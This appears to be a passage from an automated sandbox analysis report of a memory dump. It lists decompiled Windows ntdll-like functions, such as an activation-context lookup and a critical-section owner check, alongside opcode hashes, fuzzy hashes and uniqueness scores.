                                                            • String ID: WindowsExcludedProcs
                                                            • API String ID: 0-3583428290
                                                            • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                            • Instruction ID: 911fd948c49720e6356de2822ca6d886608cb9b185f56ad3401f3f193876cc36
                                                            • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                            • Instruction Fuzzy Hash: 9221267B620229ABDB22AA5DC840F6BBBADEF51A54F058425FE04DB600D634DC10C7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012EF716, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E012EF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                            0x012ef71d
                                                            0x012ef722
                                                            0x012ef726
                                                            0x01334770
                                                            0x012ef765
                                                            0x012ef769
                                                            0x012ef769
                                                            0x012ef732
                                                            0x0133477a
                                                            0x00000000
                                                            0x0133477a
                                                            0x012ef738
                                                            0x012ef73a
                                                            0x012ef73c
                                                            0x012ef73f
                                                            0x012ef746
                                                            0x012ef778
                                                            0x012ef7a9
                                                            0x012ef7a9
                                                            0x012ef754
                                                            0x012ef75a
                                                            0x012ef75d
                                                            0x012ef75f
                                                            0x012ef761
                                                            0x012ef76f
                                                            0x012ef771
                                                            0x012ef771
                                                            0x012ef76f
                                                            0x012ef763
                                                            0x00000000
                                                            0x012ef763
                                                            0x012ef77d
                                                            0x012ef7a3
                                                            0x012ef7a5
                                                            0x00000000
                                                            0x012ef7a5
                                                            0x012ef77f
                                                            0x012ef782
                                                            0x012ef784
                                                            0x012ef786
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x012ef788
                                                            0x012ef748
                                                            0x012ef74d
                                                            0x012ef78d
                                                            0x012ef793
                                                            0x012ef7b7
                                                            0x012ef7bc
                                                            0x00000000
                                                            0x012ef7bc
                                                            0x012ef798
                                                            0x00000000
                                                            0x00000000
                                                            0x012ef79d
                                                            0x012ef7b0
                                                            0x00000000
                                                            0x012ef7b0
                                                            0x012ef79f
                                                            0x00000000
                                                            0x012ef74f
                                                            0x012ef74f
                                                            0x00000000
                                                            0x012ef74f

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Actx
                                                            • API String ID: 0-89312691
                                                            • Opcode ID: e144562db8c4228058358871919d79170cb605dbf1c085ff5ea9ee5d61f0bb8a
                                                            • Instruction ID: 364912439119a1ebe69f49c24c3f20055edd81542301393759ed51ecb537c226
                                                            • Opcode Fuzzy Hash: e144562db8c4228058358871919d79170cb605dbf1c085ff5ea9ee5d61f0bb8a
                                                            • Instruction Fuzzy Hash: FA11B6353B47038BEB2D4E1D8B9973676D6EB85624FA5452AEA65CB391D7B0C840C340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01378DF1, Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E01378DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x13a0d50);
				E0131D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01355720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0131DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0131DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0131D130(_t34, _t39, _t40);
			}





                                                            0x01378df1
                                                            0x01378df1
                                                            0x01378df1
                                                            0x01378df1
                                                            0x01378df1
                                                            0x01378df1
                                                            0x01378df3
                                                            0x01378df8
                                                            0x01378dfd
                                                            0x01378e00
                                                            0x01378e0e
                                                            0x01378e2a
                                                            0x01378e36
                                                            0x01378e38
                                                            0x01378e3c
                                                            0x01378e46
                                                            0x01378e46
                                                            0x01378e36
                                                            0x01378e50
                                                            0x01378e56
                                                            0x01378e59
                                                            0x01378e5c
                                                            0x01378e60
                                                            0x01378e67
                                                            0x01378e6d
                                                            0x01378e73
                                                            0x01378e74
                                                            0x01378eb1
                                                            0x01378ebd

                                                            Strings
                                                            • Critical error detected %lx, xrefs: 01378E21
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Critical error detected %lx
                                                            • API String ID: 0-802127002
                                                            • Opcode ID: 0f4e4b2789a56ee0c3d4bfa616734faf556dcf74f29f943d38697c9c13768747
                                                            • Instruction ID: 238d73d65e5f6e9f1f3cc44f1485d4fa9ce43ae0f331a0b285f32e88717324d0
                                                            • Opcode Fuzzy Hash: 0f4e4b2789a56ee0c3d4bfa616734faf556dcf74f29f943d38697c9c13768747
                                                            • Instruction Fuzzy Hash: 72115B75D15348EADF29CFA885097DCBBB0BB15359F24465DE52D6B682C3381601CF14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0135FF10, Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0135FF60
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                            • API String ID: 0-1911121157
                                                            • Opcode ID: b325dc2d0fc4e68944212bc7a7d24175b6b544ebcceb220af2e02e23ed443ca2
                                                            • Instruction ID: 25fd731dad0387685315aecb229341043b4cab031b98e6856db2800b60ecb4fd
                                                            • Opcode Fuzzy Hash: b325dc2d0fc4e68944212bc7a7d24175b6b544ebcceb220af2e02e23ed443ca2
                                                            • Instruction Fuzzy Hash: 9B112671550144EFDF66DF58C988F98BBB5FF05B08F148058FA0857AA1C7389944CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01395BA5, Relevance: .6, Instructions: 592COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7e64935c42c32ee5b46da7fd440a439598d3a5c3c3a96fe68fc6de5f64fa4730
                                                            • Instruction ID: 527eac014dee62a4157387fb0c9d0496986dcba8fae2e808bb21b5663f5c9401
                                                            • Opcode Fuzzy Hash: 7e64935c42c32ee5b46da7fd440a439598d3a5c3c3a96fe68fc6de5f64fa4730
                                                            • Instruction Fuzzy Hash: 2D425AB1D01229CFDF25CF68C881BA9BBB5FF49308F1481AAD94DAB252D7349985CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012E4120, Relevance: .4, Instructions: 444COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 868c3ad9a2544164613e437a274261403c3b06bac6b19b697e2bea98abe73616
                                                            • Instruction ID: dce5a594fddad1ec4f5527fda3194c9b93c9fc1bcc2d18f845708fa60f4c5817
                                                            • Opcode Fuzzy Hash: 868c3ad9a2544164613e437a274261403c3b06bac6b19b697e2bea98abe73616
                                                            • Instruction Fuzzy Hash: 73F1B0706283528FC724EF18C485A7AB7E1FF99718F94492EF586CB291E734D881CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012F20A0, Relevance: .4, Instructions: 420COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 67b6423d918636b8d9e50b92f19aabce898b605562288fb1fffbba2e4d1872fb
                                                            • Instruction ID: fd5671f0dd99e35dc57df20630a0503f5fd36be3a482edef4672709d8fd8c7fd
                                                            • Opcode Fuzzy Hash: 67b6423d918636b8d9e50b92f19aabce898b605562288fb1fffbba2e4d1872fb
                                                            • Instruction Fuzzy Hash: 4FF1F575618342DFE726CB2CC48076BBBE5ABC6328F04852DEB958B281D774D841CB86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012DD5E0, Relevance: .4, Instructions: 353COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eedf39e14f9d0da65e42ef9dbf9019c04772756fd76e83d784cc47696db2837e
                                                            • Instruction ID: f4226dc1b84e33ad02aa50660401f61e244c425246e101b5ab765e29fe25f667
                                                            • Opcode Fuzzy Hash: eedf39e14f9d0da65e42ef9dbf9019c04772756fd76e83d784cc47696db2837e
                                                            • Instruction Fuzzy Hash: F6E1D230A1075ACFEB35DF68C880BA9B7B5BF45308F0501E9DA09AB2C5D774A981CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012D849B, Relevance: .3, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 28e502f9845995428c1c0555ddebbfd9b3c4892e8609775785b568434cd7d803
                                                            • Instruction ID: d8fdfce1048655501038db448aae60f674f27a2f5eff0e0187134c7135882321
                                                            • Opcode Fuzzy Hash: 28e502f9845995428c1c0555ddebbfd9b3c4892e8609775785b568434cd7d803
                                                            • Instruction Fuzzy Hash: 2CB16E74E2025ADFDB19DF99C984AADBBB9FF48308F10412DE605AB345D770A941CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012F513A, Relevance: .3, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e5bfe7f0647793d8f3f2a51c5b3b8b87824e232c850fc8f1de1021f22cd1bef
                                                            • Instruction ID: 35c5ab7befe460a589d6d56151216a25a6885c380a77eb1d85b36f33586a2d69
                                                            • Opcode Fuzzy Hash: 5e5bfe7f0647793d8f3f2a51c5b3b8b87824e232c850fc8f1de1021f22cd1bef
                                                            • Instruction Fuzzy Hash: 59C153B55083819FD354CF28C581A6AFBF1BF88308F184A6EF9998B352D370E945CB56
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012F03E2, Relevance: .3, Instructions: 254COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 71c58de7c9ebe2c28d10e6fb3a173704e648c3fdd58c7a885ef1816bff18733b
                                                            • Instruction ID: aa67849905d9884f1e5480309581b5f4dca938a206fb1b7cdb22a3d4ddc96932
                                                            • Opcode Fuzzy Hash: 71c58de7c9ebe2c28d10e6fb3a173704e648c3fdd58c7a885ef1816bff18733b
                                                            • Instruction Fuzzy Hash: 8A912931E10259AFEB329B6CC848BADBBE5EB41718F050279FB11A72D2D7749C00C799
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012CC600, Relevance: .2, Instructions: 225COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 035c7657f6938f156c8c0b79cf67359e21756ae032bca983422995f01c4562d7
                                                            • Instruction ID: c973a94c5d110b43e9634dc84aa5cbbb13da93cefdea955d088fb622cf5e88a9
                                                            • Opcode Fuzzy Hash: 035c7657f6938f156c8c0b79cf67359e21756ae032bca983422995f01c4562d7
                                                            • Instruction Fuzzy Hash: 9881B3B56142068FEB2ACE58C880F3A77E8EBC4358F14491EEE458B751D330DD41CBAA
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01346DC9, Relevance: .2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                            • Instruction ID: 8c75664ae6c1d853848036535b4a763d5eb31f7a29f55ec73759f727b1b25a8f
                                                            • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                            • Instruction Fuzzy Hash: 96716CB1A0020AEFDB11DFA9C984EEEBBF9FF48714F144169E505E7250DB30AA41CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0135B8D0, Relevance: .2, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1b054fff3aee8d874066e987d72683d0cb5fbb1621bae272e39ae8c5f913c4f
                                                            • Instruction ID: b832fc79b41e5d65fd7b8af6e3fcb948de64954e253ab52e5df33c69a0bbea8c
                                                            • Opcode Fuzzy Hash: c1b054fff3aee8d874066e987d72683d0cb5fbb1621bae272e39ae8c5f913c4f
                                                            • Instruction Fuzzy Hash: E271FE32200706EFE7728F19C845F66BBF6EB40B28F154528EA598B6E5DB71E940CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012C52A5, Relevance: .2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: deae486aed4a92fe6b6d3ed1b6ee1d7bc8662b60429eec2aaea64e424bf9a0ca
                                                            • Instruction ID: 1034b555865b5985450651cecb671459183fde6e29033fed66489e4d47445513
                                                            • Opcode Fuzzy Hash: deae486aed4a92fe6b6d3ed1b6ee1d7bc8662b60429eec2aaea64e424bf9a0ca
                                                            • Instruction Fuzzy Hash: 6C51F031255742ABD325EF28C841B27BBE5FF90B18F14091EF69987691E7B0F844C792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012F2AE4, Relevance: .2, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ddfd094351e9277c52d3fee827cae0be5ab0a8e695289df2c0885eda1d28ef9c
                                                            • Instruction ID: 778527a73a2e038713042e09ac364bcf19512d60e9ccba664b3a3bf7f19cd768
                                                            • Opcode Fuzzy Hash: ddfd094351e9277c52d3fee827cae0be5ab0a8e695289df2c0885eda1d28ef9c
                                                            • Instruction Fuzzy Hash: 5551B076A20119CFCB14CF1CC491ABDB7B5FB89700B16846EEE46AB355E734EA41CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0138AE44, Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4e155dc738fd533af040f6207aaf4c4349f564248c626637791cc386492c9f31
                                                            • Instruction ID: 0999e850dd4f39f05870258f7747b5b809a7ee1fc57d15096c95aafad44bc66b
                                                            • Opcode Fuzzy Hash: 4e155dc738fd533af040f6207aaf4c4349f564248c626637791cc386492c9f31
                                                            • Instruction Fuzzy Hash: CA4117B17043119BE726EB2DCC84B3BBB99EF84628F04461AF95AC76D0D774E805D690
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012EDBE9, Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8bbd2430c6cb495fedba160dc3576b64647016c38e62c2a759b6eccb6d298e2c
                                                            • Instruction ID: 762e56e8f8f11abf392ad492455443812dbd5b0aaed512a43c1a5567b34a4511
                                                            • Opcode Fuzzy Hash: 8bbd2430c6cb495fedba160dc3576b64647016c38e62c2a759b6eccb6d298e2c
                                                            • Instruction Fuzzy Hash: 9E51B072E1020ACFCB15CFACC494AAEFBF5BF48350F64815AD659A7340EB71A944CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012DEF40, Relevance: .1, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                            • Instruction ID: cc4c19f7220b2bffd12d0626ffc9a415387ded2641aa66b1f34ad7edc950dc92
                                                            • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                            • Instruction Fuzzy Hash: 5D511530E24246DFEB21CB6CC1C17AEFBB1AF05314F1881E8C6565B286C3B5A98AC751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0139740D, Relevance: .1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                            • Instruction ID: 1f2cc733e7bde21adeb8d218c1e6fe07898ff091c0befe943952974c84b868a2
                                                            • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                            • Instruction Fuzzy Hash: C8516C71610646EFDB26CF18C480A56BBF5FF45308F1480AAE9089F252E771E946CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012F2990, Relevance: .1, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ed84ab65abfa2802fcc0340dd9cfae695f170dcf0bd3491f45b750a9f8aab66
                                                            • Instruction ID: 429636a3b9f79ee4aa20bdc779d7fedb8ae0a623ee77057a33a054b3be7a3809
                                                            • Opcode Fuzzy Hash: 7ed84ab65abfa2802fcc0340dd9cfae695f170dcf0bd3491f45b750a9f8aab66
                                                            • Instruction Fuzzy Hash: 33517B7191021ADFDF26CF99C880AEEBBB5BF49354F158129EA10AB350C375D952CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012F4D3B, Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 907f71425e03bf0e1bfb34fd890cc0953740fc088ea448084463d1b7ab6e0741
                                                            • Instruction ID: 51cbbd85c01ccfa8b4da69d6fa000d4f525cf9254f5a3ec53affd774cc1e1709
                                                            • Opcode Fuzzy Hash: 907f71425e03bf0e1bfb34fd890cc0953740fc088ea448084463d1b7ab6e0741
                                                            • Instruction Fuzzy Hash: 1941C371A54358AFEB32EF18CC81FA7B7A9EB54614F0000ADEB4597281D7B0DE44CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012F4BAD, Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b89bb0f10ad76b3415b324047e7a02c452d4966471f5619135c57360f74c1a18
                                                            • Instruction ID: 52861e5d22361dcc058e0ff94d85fb6842a6f7cb0df89416515382a2732e2f18
                                                            • Opcode Fuzzy Hash: b89bb0f10ad76b3415b324047e7a02c452d4966471f5619135c57360f74c1a18
                                                            • Instruction Fuzzy Hash: 2641C875A10259AFDB21EF68C941FEAB7F4EF45700F4100A9EA08AB251D774DE80CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012D8A0A, Relevance: .1, Instructions: 120COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89a68521ca38e4c96aed186652a463e0f0ce98da59bbf8eebbf296dfd567c5ec
                                                            • Instruction ID: e518f09de00b5fa3297a2cbe1475c5330767859e8ce9bfe2c2db4969c97f6369
                                                            • Opcode Fuzzy Hash: 89a68521ca38e4c96aed186652a463e0f0ce98da59bbf8eebbf296dfd567c5ec
                                                            • Instruction Fuzzy Hash: 19415EB5A5022D9BDB24DF59CC88AB9B7F8FB54300F1045EAD919D7252EB709E80CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0138FDE2, Relevance: .1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                            • Instruction ID: 1dc3611c05113f25d1a981841778d36904f10dbc08eaa76cf4ce75552462bace
                                                            • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                            • Instruction Fuzzy Hash: 8A31F432300745AFD722AB6CC844F6ABBEDEBC5658F184058E94ACB782DB75EC41C760
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0138EA55, Relevance: .1, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                            • Instruction ID: f6278403326a1034786ea7ab65589acec05c92c82e2a025bcbe0b1ac1d417276
                                                            • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                                            • Instruction Fuzzy Hash: 8F31D2326147069BD71AEF28CC80A6BB7AAFFC4614F04492DF55687781DE34E805CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 013469A6, Relevance: .1, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2da49aca25f776d9113dbf0d762bcd9c904f1475fbe5d3de74b65d7ae1c2afa3
                                                            • Instruction ID: 5467dc552c519f8f98f889fbd93f82af8a6bf37525e59f15532b1adc557492f5
                                                            • Opcode Fuzzy Hash: 2da49aca25f776d9113dbf0d762bcd9c904f1475fbe5d3de74b65d7ae1c2afa3
                                                            • Instruction Fuzzy Hash: 2941A3B1D006099FDB15CFA9C941BFEBBF8EF49718F148169E514A7240DB70A905CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012C5210, Relevance: .1, Instructions: 107COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b32b5bbccb9f2874c047c552db6fb9426c1843b2a3507f595e08012fc0e7dbe
                                                            • Instruction ID: 803f974093660b6c8edfdc8051a9e6bbb91073911dce2abde44aeb4fe15b9026
                                                            • Opcode Fuzzy Hash: 8b32b5bbccb9f2874c047c552db6fb9426c1843b2a3507f595e08012fc0e7dbe
                                                            • Instruction Fuzzy Hash: 3031E531262611DBC72AAB18C881B7A7BE6FF50B68F114619F6590B5E1E760F804C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01303D43, Relevance: .1, Instructions: 106COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 892e833d6cfd7d559601aca1830408ea98a3b4bf4d68892b99c16f465402625b
